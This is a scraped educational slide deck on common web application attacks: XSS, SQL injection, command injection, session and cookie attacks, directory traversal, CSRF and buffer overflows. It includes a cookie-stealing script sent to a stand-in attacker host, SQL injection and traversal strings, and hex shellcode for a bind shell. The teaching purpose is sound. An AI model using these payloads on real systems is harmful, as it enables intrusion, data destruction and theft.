Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 

Web application attacks

  • 1. WEB APPLICATION ATTACKS by Hari Ruthala
  • 2. What is a Web Application? Any application that is served commonly via http or https protocol Usually being served from a remote computer acting as a host/server
  • 3. The fact that the vast majority of websites, including those considered most business critical, are riddled with vulnerabilities. Web applications are accessible openly on web there by making it more prone to hacking. Web Developers are not well versed with security issues because of which the applications are prone to vulnerabilities. Web applications run in the browser, any security loop hole in browser will lead to exploiting vulnerability in web application. Inroduction
  • 6. Cross-Site Scripting(XXS) SQL Injection Parameter Tampering Command Injection Session Management Cookie Poisoning Directory Traversal Cross-Site Request Forgery Buffer Overflows Common Web application Threats
  • 7. XSS is a vulnerability which is present in websites or web applications, allows malicious users (Hackers) to insert their client side code (normally JavaScript) in those web pages. When this malicious code along with the original webpage gets displayed in the web client (browsers like IE, Mozilla etc), allows Hackers to gain greater access of that page. What is Cross- Site Scripting(XSS)?
  • 9. Web server gets data from web client (POST, GET etc) with the request. So a malicious User can include client side code snippets (JavaScript) into the data. For example :   <script>alert (‘this site has been hacked’) ;</script> How XSS Works
  • 10. Non-persistent Persistent DOM Based Type of XSS attacks
  • 11. Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server. Non-persistent XSS also called as Reflected Xss
  • 12. In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users. example <SCRIPT> document.location= 'http://attackerhost.example/cgi- bin/cookiesteal.cgi?'+document.cookie </SCRIPT> Persistent XSS also called as stored Xss
  • 13. Persistent XSS DB Server saves XSS code to DB Server http response with XSS JavaScript http request with XSS JavaScript Hacker’s Browser Normal User Browser
  • 15. DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment. <HTML><TITLE>Welcome!</TITLE>Hi<SCRIPT>var pos= document.URL.indexOf("name=")+5;document.write(document.URL.substring(pos,document.URL.length));</SCRIPT><BR>Welcome to our system…</HTML>  Normally, this HTML page would be used for welcoming the user, e.g.:  http://www.vulnerable.site/welcome.html?name=JoeHowever, a request such as below will result in XSS  http://www.vulnerable.site/welcome.html?name=  <script>alert(document.cookie)</script> DOM based XSS attack
  • 16.
  • 17. Insert/Delete data to the database.
  • 18. Steal private information.What is SQL Injection?
  • 19. SQL Injection attacking example 1 http://example.com/db.php?id=0 http://example.com/db.php?id=0;DELETE%20FROM%20users <?php $id= $_GET[ 'id' ] ; //$id = 0;DELETE FROM users $result = mysql_query("SELECT * FROM users WHERE id={$id}"); SQL Inject Code User table data destroy
  • 20. <?php $query = "SELECT * FROM users WHERE users= ' {$_POST['username']} ' AND password= ' {$_POST['password']} ' "; mysql_query($query); //$_POST['username'] = 'bob'; //$_POST['password'] = " ' OR '1'='1 "; echo $query; ?> output: SELECT * FROM users WHERE user='bob' AND password=' ' OR '1'='1' SQL Injection attacking example 2 SQL Inject Code
  • 21. Parameter tampering is a sophisticated form of hacking that creates a change in the Uniform Resource Locator, or URL, associated with a web page. Essentially, parameter tampering makes it possible for the hacker to gain access to any information entered by an end user on an effected web page, and redirect it to the hacker for unauthorized use. This type of hacking activity is often employed to gain access to personal information such as credit card numbers, government issued identification numbers, and other data that is of a proprietary nature. Parameter Tampering
  • 24. OS Commanding is an attack technique used for unauthorized execution of operating system commands. This attack is possible when an application accepts untrusted input to build operating system commands in an insecure manner involving improper data sanitization, and/or improper calling of external programs. In OS Commanding, executed commands by an attacker will run with the same privileges of the component that executed the command, (e.g. database server, web application server, web server, application). Since the commands are executed under the privileges of the executing component an attacker can leverage this to gain access or damage parts that are otherwise unreachable (e.g. the operating system directories and files). Command Injection
  • 25. Command Injection Perl - Example open function is part of the API Perl provides for file handling. Improper use of this function may result in OS Commanding since Perl allows piping data from a process into an open statement, by appending a '|' (Pipe) character onto the end of a filename. # The code below executes "/bin/ls" and pipe the output to the open statement open FILE, "/bin/ls|" or die $!; Web applications often include parameters that specify a file that is displayed or used as a template. Without proper input validation, an attacker may change the parameter value to include a shell command followed by the pipe symbol, shown above. If the original URL of the web application is: http://example/cgi-bin/showInfo.pl?name=John&template=tmp1.txt Changing the template parameter value, the attacker can trick the web application into executing the command /bin/ls: http://example /cgi-bin/showInfo.pl?name=John&template=/bin/ls|
  • 26. In human-computer interaction, session management is the process of keeping track of a user's activity across sessions of interaction with the computer system. HTTP/s Protocol does not provide tracking of a users session. Session tracking answers the question: After a user authenticates how does the server associate subsequent requests to the authenticated user? Typically, Web Application Vendors provide a built-in session tracking, which is good if used properly. Session Management
  • 27. Session Management Solutions URL Encoding The session token is part of the URL and will be transmitted to the web server through HTTP GET requests Example: http://www.blabla.com/buy.asp?article=27781;sessionid=IE5579901578 Hidden Form Fields It is one of the way to maintain the session. In hidden form fields the html entry will be like this : <INPUT TYPE="hidden" NAME="user"VALUE="Jennifer"> This means that when you submit the form, the specified name and value will be get included in get or post method. In this session ID information would be embedded within the form as a hidden field and submitted with the http post command. Cookies Cookies are a simple session management mechanism The cookie is sent as an HTTP header by a web server to a web browser and then sent back unchanged by the browser each time it accesses that server. HTTP format is Set-Cookie: cookie-value
  • 28. Session Management Attack Scenarios Session Hijacking Session Replay Session Fixation Session Tempering
  • 29. Many Web applications use cookies to save information (user IDs, passwords, account numbers, time stamps, etc.) Involve the modification of the contents of a cookie(personal information stored in a Web user's computer) in order to bypass security mechanisms. Cookie poisoning is in fact a Parameter Tampering attack, where the parameters are stored in a cookie Gain unauthorized information about another user and steal Identity. Cookie Poisoning
  • 30. Cookie Poisoning - Example The request includes a cookie that contains the following parameters: SESSIONID, which is a unique identification string that associates the user with the site, BasketSize, the price of each item and the TotalPrice. when executed by the Web server, buy.asp retrieves the cookie from the user, analyzes the cookie's parameters and charges the user account according to the TotalPrice parameter. An attacker can change, for example, the TotalPrice parameter in order to get a "special discount". GET /store/buy.asp?checkout=yes HTTP/1.0 Host: www.onlineshop.com Accept: */* Referrer: http://www.onlineshop.com/showprods.asp Cookie: SESSIONID=570321ASDD23SA2321; BasketSize=3; Item1=2892; Item2=3210; Item3=9942; TotalPrice=16044;
  • 31. A Path Traversal attack aims to access files and directories that are stored outside the web root folder. The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system. The attacker needs to guess how many directories to climb in order to get to the desired directory. Attackers might view restricted files or execute powerful commands on the Web server, leading to a full compromise of the Web server. Directory Traversal
  • 32. Directory Traversal - Example Web server, getnews.asp retrieves the file 20March2003.html from the Web server's file system, renders it and sends it back to the browser which presents it to the user. The attacker causes getnews.asp to retrieve the file ../../../../WINNT/win.ini from the file system and send it to the attacker's browser. http://www.acme-hackme.com/online/getnews.asp?item=20March2003.html http://www.acme-hackme.com/online/getnews.asp?item=../../../../ WINNT/win.ini
  • 33. Description An attack that tricks the victim into loading a page that contains a malicious request. Performs GET/POST request of attacker’s choice on behalf of logged in user The attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website. Also known as Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking, and Automation Attack Affected Environments All web application frameworks are vulnerable to CSRF. Cross-Site Request Forgery
  • 34. CSRF Continued Logging Request Auth Cookies Legitimate Request Bob Bank.com View My Pictuires Money Transfer Hacker sends a Malicious href tag to bob <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>
  • 35. CSRF Continued Alice wishes to transfer $100 to Bob using bank.com. The request generated by Alice will look similar to the following: However, Maria notices that the same web application will execute the same transfer using URL parameters as follows: Maria must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following POST http://bank.com/transfer.do HTTP/1.1 ... Content-Length: 19; acct=BOB&amount=100 GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1 <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>
  • 36. Buffer is storage space for data. Buffer overflow occurs when the user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas. It is well known vulnerability Attacker will inject data with shellcode into the allocated stack area. By over-writing return addresses he will run his malicious code. Buffer Overflows
  • 37. Buffer Overflow Continued Example of shellcode BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]= "31db5343536a0289e1b066cd80" "31d2526668bc0a666a0289e26a" "10526a0389e1fec3b066cd806a" "026a0389e1b304b066cd8031c9" "51516a0389e1fec3b066cd8031" "db536a3a685061737389e66a05" "566a0489e1b309b066cd8031c9" "31f6516a05526a0489e1b30ab0" "66cd8031c9516a72686861786f" "89e789d680c105fcf3a675bf31" "c9b304b03fcd804183f90375f6" "31c050682f2f7368682f62696e" "89e3505389e131d2b00bcd80b0" "01cd80“
  • 38. void get_input() { char buf[1024]; gets(buf); } void main (int argc, char *argv[]) { get_input(); } Malicious User enters >1024 chars, but buf can only stores 1024 chars; Extra chars overflow the buffer Buffer Overflow Continued - Example